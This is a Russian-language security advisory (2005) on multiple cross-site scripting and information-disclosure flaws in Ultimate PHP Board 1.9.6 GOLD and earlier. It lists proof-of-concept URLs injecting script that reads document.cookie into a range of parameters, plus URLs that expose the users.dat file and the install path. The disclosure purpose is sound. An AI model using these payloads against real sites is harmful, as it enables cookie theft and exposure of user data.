Межсайтовый скриптинг в Ultimate PHP Board (UPB)

Дата публикации:
20.06.2005
Всего просмотров:
1440
Опасность:
Средняя
Наличие исправления:
Частично
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-2003
CVE-2005-2004
CVE-2005-2005
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Ultimate PHP Board (UPB) 1.x
Уязвимые версии: Ultimate PHP Board 1.9.6 GOLD и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке входных данных в различных сценариях. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

http://[target]/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/newpost.php?id= 1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[ta rget]/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E

http://[target]/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/scr ipt%3E

http://[target]/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

http://[target]/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Удаленный пользователь может также получить потенциально важную информацию о пользователях и узнать установочную директорию приложения. Примеры:

http://[target]/upb/db/users.dat

http://[target]/upb/viewtopic.php?id=0

http://[target]/upb/profile.php?action=get&id=0

http://[target]/upb/newpost.php?t_id=0

URL производителя: www.myupb.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB

или введите имя

CAPTCHA